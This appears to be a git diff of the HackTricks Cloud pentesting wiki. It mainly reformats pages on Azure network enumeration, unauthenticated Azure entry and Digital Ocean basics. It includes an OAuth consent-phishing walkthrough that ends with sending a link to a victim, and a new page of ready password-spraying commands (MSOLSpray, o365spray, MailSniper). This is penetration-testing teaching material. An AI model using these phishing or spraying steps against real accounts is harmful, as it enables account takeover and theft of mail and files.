@@ -344,24 +332,24 @@ And **protect your website from attacks using the WAF capabilities.**
 
 ### **Enumeration**
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List the Web Application Firewall configurations for your Application Gateways
 az network application-gateway waf-config list --gateway-name  --resource-group  --query "[].{name:name, firewallMode:firewallMode, ruleSetType:ruleSetType, ruleSetVersion:ruleSetVersion}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List the Web Application Firewall configurations for your Application Gateways
 (Get-AzApplicationGateway -Name  -ResourceGroupName ).WebApplicationFirewallConfiguration
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ## Azure Hub, Spoke & VNet Peering
 
@@ -370,9 +358,7 @@ az network application-gateway waf-config list --gateway-name  -
 
 **Azure Hub and Spoke** is a network topology used in Azure to manage and organize network traffic. **The "hub" is a central point that controls and routes traffic between different "spokes"**. The hub typically contains shared services such as network virtual appliances (NVAs), Azure VPN Gateway, Azure Firewall, or Azure Bastion. The **"spokes" are VNets that host workloads and connect to the hub using VNet peering**, allowing them to leverage the shared services within the hub. This model promotes clean network layout, reducing complexity by centralizing common services that multiple workloads across different VNets can use.
 
-{% hint style="danger" %}
-**VNET pairing is non-transitive in Azure**, which means that if spoke 1 is connected to spoke 2 and spoke 2 is connected to spoke 3 then spoke 1 cannot talk directly to spoke 3.
-{% endhint %}
+> [!CAUTION] > **VNET pairing is non-transitive in Azure**, which means that if spoke 1 is connected to spoke 2 and spoke 2 is connected to spoke 3 then spoke 1 cannot talk directly to spoke 3.
 
 **Example:**
 
@@ -380,9 +366,9 @@ Imagine a company with separate departments like Sales, HR, and Development, **e
 
 ### Enumeration
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List all VNets in your subscription
 az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}" -o table
@@ -393,13 +379,13 @@ az network vnet peering list --resource-group  --vnet-name  -Name ).VirtualNetworkPeerings
@@ -407,9 +393,9 @@ Get-AzVirtualNetwork
 # List Shared Resources (e.g., Azure Firewall) in the Hub
 Get-AzFirewall
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ## Site-to-Site VPN
 
@@ -421,9 +407,9 @@ A business with its main office located in New York has an on-premises data cent
 
 ### **Enumeration**
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List VPN Gateways
 az network vnet-gateway list --query "[].{name:name, location:location, resourceGroup:resourceGroup}" -o table
@@ -431,10 +417,10 @@ az network vnet-gateway list --query "[].{name:name, location:location, resource
 # List VPN Connections
 az network vpn-connection list --gateway-name  --resource-group  --query "[].{name:name, connectionType:connectionType, connectionStatus:connectionStatus}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List VPN Gateways
 Get-AzVirtualNetworkGateway -ResourceGroupName 
@@ -442,9 +428,9 @@ Get-AzVirtualNetworkGateway -ResourceGroupName 
 # List VPN Connections
 Get-AzVirtualNetworkGatewayConnection -ResourceGroupName 
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ## Azure ExpressRoute
 
@@ -456,36 +442,23 @@ A multinational corporation requires a **consistent and reliable connection to i
 
 ### **Enumeration**
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List ExpressRoute Circuits
 az network express-route list --query "[].{name:name, location:location, resourceGroup:resourceGroup, serviceProviderName:serviceProviderName, peeringLocation:peeringLocation}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List ExpressRoute Circuits
 Get-AzExpressRouteCircuit
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+{{#endtab }}
+{{#endtabs }}
 
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md
similarity index 80%
rename from pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md
rename to src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md
index 6fd2ea79d..d9358cdee 100644
--- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md
+++ b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md
@@ -1,19 +1,6 @@
 # Az - Unauthenticated Enum & Initial Entry
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Azure Tenant
 
@@ -142,11 +129,11 @@ Output:
 
 Furthermore it is possible to enumerate availability information about existing users like the following:
 
-* Available
-* Away
-* DoNotDisturb
-* Busy
-* Offline
+- Available
+- Away
+- DoNotDisturb
+- Busy
+- Offline
 
 If an **out-of-office message** is configured, it's also possible to retrieve the message using TeamsEnum. If an output file was specified, the out-of-office messages are automatically stored within the JSON file:
 
@@ -192,10 +179,7 @@ Output:
           },
           "isOutOfOffice": true
         },
-        "capabilities": [
-          "Audio",
-          "Video"
-        ],
+        "capabilities": ["Audio", "Video"],
         "availability": "Away",
         "activity": "Away",
         "deviceType": "Mobile"
@@ -247,31 +231,18 @@ Use [**Storage Explorer**](https://azure.microsoft.com/en-us/features/storage-ex
 
 ### Phishing
 
-* [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or OAuth App -[Illicit Consent Grant Attack](az-oauth-apps-phishing.md)-)
-* [**Device Code Authentication** Phishing](az-device-code-authentication-phishing.md)
+- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or OAuth App -[Illicit Consent Grant Attack](az-oauth-apps-phishing.md)-)
+- [**Device Code Authentication** Phishing](az-device-code-authentication-phishing.md)
 
 ### Password Spraying / Brute-Force
 
-{% content-ref url="az-password-spraying.md" %}
-[az-password-spraying.md](az-password-spraying.md)
-{% endcontent-ref %}
+{{#ref}}
+az-password-spraying.md
+{{#endref}}
 
 ## References
 
-* [https://aadinternals.com/post/just-looking/](https://aadinternals.com/post/just-looking/)
-* [https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/](https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/)
+- [https://aadinternals.com/post/just-looking/](https://aadinternals.com/post/just-looking/)
+- [https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/](https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md
new file mode 100644
index 000000000..2b0e09538
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md
@@ -0,0 +1,7 @@
+# Az - Device Code Authentication Phishing
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+**Check:** [**https://o365blog.com/post/phishing/**](https://o365blog.com/post/phishing/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md
similarity index 62%
rename from pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md
rename to src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md
index 540e9a615..765af036d 100644
--- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md
+++ b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md
@@ -1,19 +1,6 @@
 # Az - OAuth Apps Phishing
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## OAuth App Phishing
 
@@ -23,50 +10,45 @@ Learn & practice GCP Hacking: 

+

 
 If users cannot consent, **admins** like `GA`, `Application Administrator` or `Cloud Application` `Administrator` can **consent the applications** that users will be able to use.
 
-Moreover, if users can consent only to apps using **low risk** permissions, these permissions are by default **openid**, **profile**, **email**, **User.Read** and **offline\_access**, although it's possible to **add more** to this list.
+Moreover, if users can consent only to apps using **low risk** permissions, these permissions are by default **openid**, **profile**, **email**, **User.Read** and **offline_access**, although it's possible to **add more** to this list.
 
 nd if they can consent to all apps, they can consent to all apps.
 
 ### 2 Types of attacks
 
-* **Unauthenticated**: From an external account create an application with the **low risk permissions** `User.Read` and `User.ReadBasic.All` for example, phish a user, and you will be able to access directory information.
-  * This requires the phished user to be **able to accept OAuth apps from external tenant**
-  * If the phised user is an some admin that can **consent any app with any permissions**, the application could also **request privileged permissions**
-* **Authenticated**: Having compromised a principal with enough privileges, **create an application inside the account** and **phish** some **privileged** user which can accept privileged OAuth permissions.
-  * In this case you can already access the info of the directory, so the permission `User.ReadBasic.All` isn't no longer interesting.
-  * You are probable interested in **permissions that require and admin to grant them**, because raw user cannot give OAuth apps any permission, thats why you need to **phish only those users** (more on which roles/permissions grant this privilege later)
+- **Unauthenticated**: From an external account create an application with the **low risk permissions** `User.Read` and `User.ReadBasic.All` for example, phish a user, and you will be able to access directory information.
+  - This requires the phished user to be **able to accept OAuth apps from external tenant**
+  - If the phised user is an some admin that can **consent any app with any permissions**, the application could also **request privileged permissions**
+- **Authenticated**: Having compromised a principal with enough privileges, **create an application inside the account** and **phish** some **privileged** user which can accept privileged OAuth permissions.
+  - In this case you can already access the info of the directory, so the permission `User.ReadBasic.All` isn't no longer interesting.
+  - You are probable interested in **permissions that require and admin to grant them**, because raw user cannot give OAuth apps any permission, thats why you need to **phish only those users** (more on which roles/permissions grant this privilege later)
 
 ### Users are allowed to consent
 
 Note that you need to execute this command from a user inside the tenant, you cannot find this configuration of a tenant from an external one. The following cli can help you understand the users permissions:
 
-{% code overflow="wrap" %}
 ```bash
 az rest --method GET --url "https://graph.microsoft.com/v1.0/policies/authorizationPolicy"
 ```
-{% endcode %}
 
-* Users can consent to all apps: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForSelf.microsoft-user-default-legacy` then users can to accept every application.
-* Users can consent to apps from verified publishers or your organization, but only for permissions you select: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users can to accept every application.
-* **Disable user consent**: If inside **`permissionGrantPoliciesAssigned`** you can only find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-chat` and `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users cannot consent any.
+- Users can consent to all apps: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForSelf.microsoft-user-default-legacy` then users can to accept every application.
+- Users can consent to apps from verified publishers or your organization, but only for permissions you select: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users can to accept every application.
+- **Disable user consent**: If inside **`permissionGrantPoliciesAssigned`** you can only find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-chat` and `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users cannot consent any.
 
 It's possible to find the meaning of each of the commented policies in:
 
-{% code overflow="wrap" %}
 ```bash
 az rest --method GET --url "https://graph.microsoft.com/v1.0/policies/permissionGrantPolicies"
 ```
-{% endcode %}
 
 ### **Application Admins**
 
 Check users that are considered application admins (can accept new applications):
 
-{% code overflow="wrap" %}
 ```bash
 # Get list of roles
 az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles"
@@ -80,7 +62,6 @@ az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/1e92
 # Get Cloud Applications Administrators
 az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/0d601d27-7b9c-476f-8134-8e7cd6744f02/members"
 ```
-{% endcode %}
 
 ## **Attack Flow Overview**
 
@@ -96,30 +77,28 @@ The attack involves several steps targeting a generic company. Here's how it mig
 1. Register a **new application**. It can be only for the current directory if you are using an user from the attacked directory or for any directory if this is an external attack (like in the following image).
    1. Also set the **redirect URI** to the expected URL where you want to receive the code to the get tokens (`http://localhost:8000/callback` by default).
 
-

+

 
 2. Then create an application secret:
 
-

+

 
 3. Select API permissions (e.g. `Mail.Read`, `Notes.Read.All`, `Files.ReadWrite.All`, `User.ReadBasic.All`, `User.Read)`
 
-

+

 
-4. **Execute the web page (**[**azure\_oauth\_phishing\_example**](https://github.com/carlospolop/azure_oauth_phishing_example)**)** that asks for the permissions:
+4. **Execute the web page (**[**azure_oauth_phishing_example**](https://github.com/carlospolop/azure_oauth_phishing_example)**)** that asks for the permissions:
 
-{% code overflow="wrap" %}
 ```bash
 # From https://github.com/carlospolop/azure_oauth_phishing_example
 python3 azure_oauth_phishing_example.py --client-secret  --client-id  --scopes "email,Files.ReadWrite.All,Mail.Read,Notes.Read.All,offline_access,openid,profile,User.Read"
 ```
-{% endcode %}
 
 5. **Send the URL to the victim**
    1. In this case `http://localhost:8000`
 6. **Victims** needs to **accept the prompt:**
 
-

+

 
 7. Use the **access token to access the requested permissions**:
 
@@ -147,8 +126,8 @@ curl -X GET \
 
 ## Other Tools
 
-* [**365-Stealer**](https://github.com/AlteredSecurity/365-Stealer)**:** Check [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer) to learn how to configure it.
-* [**O365-Attack-Toolkit**](https://github.com/mdsecactivebreach/o365-attack-toolkit)
+- [**365-Stealer**](https://github.com/AlteredSecurity/365-Stealer)**:** Check [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer) to learn how to configure it.
+- [**O365-Attack-Toolkit**](https://github.com/mdsecactivebreach/o365-attack-toolkit)
 
 ## Post-Exploitation
 
@@ -160,26 +139,13 @@ Depending on the requested permissions you might be able to **access different d
 
 Check the Applications and Service Principal sections of the page:
 
-{% content-ref url="../az-privilege-escalation/az-entraid-privesc/" %}
-[az-entraid-privesc](../az-privilege-escalation/az-entraid-privesc/)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-entraid-privesc/
+{{#endref}}
 
 ## References
 
-* [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer)
-* [https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/)
+- [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer)
+- [https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md
new file mode 100644
index 000000000..4b423dca4
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md
@@ -0,0 +1,35 @@
+# Az - Password Spraying
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Password Spray
+
+In **Azure** this can be done against **different API endpoints** like Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, etc.
+
+However, note that this technique is **very noisy** and Blue Team can **easily catch it**. Moreover, **forced password complexity** and the use of **MFA** can make this technique kind of useless.
+
+You can perform a password spray attack with [**MSOLSpray**](https://github.com/dafthack/MSOLSpray)
+
+```powershell
+. .\MSOLSpray\MSOLSpray.ps1
+Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose
+```
+
+Or with [**o365spray**](https://github.com/0xZDH/o365spray)
+
+```bash
+python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com
+```
+
+Or with [**MailSniper**](https://github.com/dafthack/MailSniper)
+
+```powershell
+#OWA
+Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
+#EWS
+Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
+#Gmail
+Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
new file mode 100644
index 000000000..987595e03
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
@@ -0,0 +1,41 @@
+# Az - VMs Unath
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Virtual Machines
+
+For more info about Azure Virtual Machines check:
+
+{{#ref}}
+../az-services/vms/
+{{#endref}}
+
+### Exposed vulnerable service
+
+A network service that is vulnerable to some RCE.
+
+### Public Gallery Images
+
+A public image might have secrets inside of it:
+
+```bash
+# List all community galleries
+az sig list-community --output table
+
+# Search by publisherUri
+az sig list-community --output json --query "[?communityMetadata.publisherUri=='https://3nets.io']"
+```
+
+### Public Extensions
+
+This would be more weird but not impossible. A big company might put an extension with sensitive data inside of it:
+
+```bash
+# It takes some mins to run
+az vm extension image list --output table
+
+# Get extensions by publisher
+az vm extension image list --publisher "Site24x7" --output table
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/README.md b/src/pentesting-cloud/digital-ocean-pentesting/README.md
new file mode 100644
index 000000000..10e077695
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/README.md
@@ -0,0 +1,43 @@
+# Digital Ocean Pentesting
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+**Before start pentesting** a Digital Ocean environment there are a few **basics things you need to know** about how DO works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
+
+Concepts such as hierarchy, access and other basic concepts are explained in:
+
+{{#ref}}
+do-basic-information.md
+{{#endref}}
+
+## Basic Enumeration
+
+### SSRF
+
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
+{{#endref}}
+
+### Projects
+
+To get a list of the projects and resources running on each of them from the CLI check:
+
+{{#ref}}
+do-services/do-projects.md
+{{#endref}}
+
+### Whoami
+
+```bash
+doctl account get
+```
+
+## Services Enumeration
+
+{{#ref}}
+do-services/
+{{#endref}}
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md b/src/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md
similarity index 73%
rename from pentesting-cloud/digital-ocean-pentesting/do-basic-information.md
rename to src/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md
index 6e93e0b75..b6f64e516 100644
--- a/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md
@@ -1,19 +1,6 @@
 # DO - Basic Information
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -21,10 +8,10 @@ DigitalOcean is a **cloud computing platform that provides users with a variety
 
 Some of the key features of DigitalOcean include:
 
-* **Virtual private servers (VPS)**: DigitalOcean provides VPS that can be used to host websites and applications. These VPS are known for their simplicity and ease of use, and can be quickly and easily deployed using a variety of pre-built "droplets" or custom configurations.
-* **Storage**: DigitalOcean offers a range of storage options, including object storage, block storage, and managed databases, that can be used to store and manage data for websites and applications.
-* **Development and deployment tools**: DigitalOcean provides a range of tools that can be used to build, deploy, and manage applications, including APIs and pre-built droplets.
-* **Security**: DigitalOcean places a strong emphasis on security, and offers a range of tools and features to help users keep their data and applications safe. This includes encryption, backups, and other security measures.
+- **Virtual private servers (VPS)**: DigitalOcean provides VPS that can be used to host websites and applications. These VPS are known for their simplicity and ease of use, and can be quickly and easily deployed using a variety of pre-built "droplets" or custom configurations.
+- **Storage**: DigitalOcean offers a range of storage options, including object storage, block storage, and managed databases, that can be used to store and manage data for websites and applications.
+- **Development and deployment tools**: DigitalOcean provides a range of tools that can be used to build, deploy, and manage applications, including APIs and pre-built droplets.
+- **Security**: DigitalOcean places a strong emphasis on security, and offers a range of tools and features to help users keep their data and applications safe. This includes encryption, backups, and other security measures.
 
 Overall, DigitalOcean is a cloud computing platform that provides users with the tools and resources they need to build, deploy, and manage applications in the cloud. Its services are designed to be simple and easy to use, making them popular among developers and small businesses.
 
@@ -143,19 +130,6 @@ The **logs of a team** can be found in [**https://cloud.digitalocean.com/account
 
 ## References
 
-* [https://docs.digitalocean.com/products/teams/how-to/manage-membership/](https://docs.digitalocean.com/products/teams/how-to/manage-membership/)
+- [https://docs.digitalocean.com/products/teams/how-to/manage-membership/](https://docs.digitalocean.com/products/teams/how-to/manage-membership/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md b/src/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md
new file mode 100644
index 000000000..d8742796e
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md
@@ -0,0 +1,7 @@
+# DO - Permissions for a Pentest
+
+{{#include ../../banners/hacktricks-training.md}}
+
+DO doesn't support granular permissions. So the **minimum role** that allows a user to review all the resources is **member**. A pentester with this permission will be able to perform harmful activities, but it's what it's.
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/README.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/README.md
new file mode 100644
index 000000000..1a7ac183b
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/README.md
@@ -0,0 +1,19 @@
+# DO - Services
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+DO offers a few services, here you can find how to **enumerate them:**
+
+- [**Apps**](do-apps.md)
+- [**Container Registry**](do-container-registry.md)
+- [**Databases**](do-databases.md)
+- [**Droplets**](do-droplets.md)
+- [**Functions**](do-functions.md)
+- [**Images**](do-images.md)
+- [**Kubernetes (DOKS)**](do-kubernetes-doks.md)
+- [**Networking**](do-networking.md)
+- [**Projects**](do-projects.md)
+- [**Spaces**](do-spaces.md)
+- [**Volumes**](do-volumes.md)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md
new file mode 100644
index 000000000..03c70acee
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md
@@ -0,0 +1,34 @@
+# DO - Apps
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
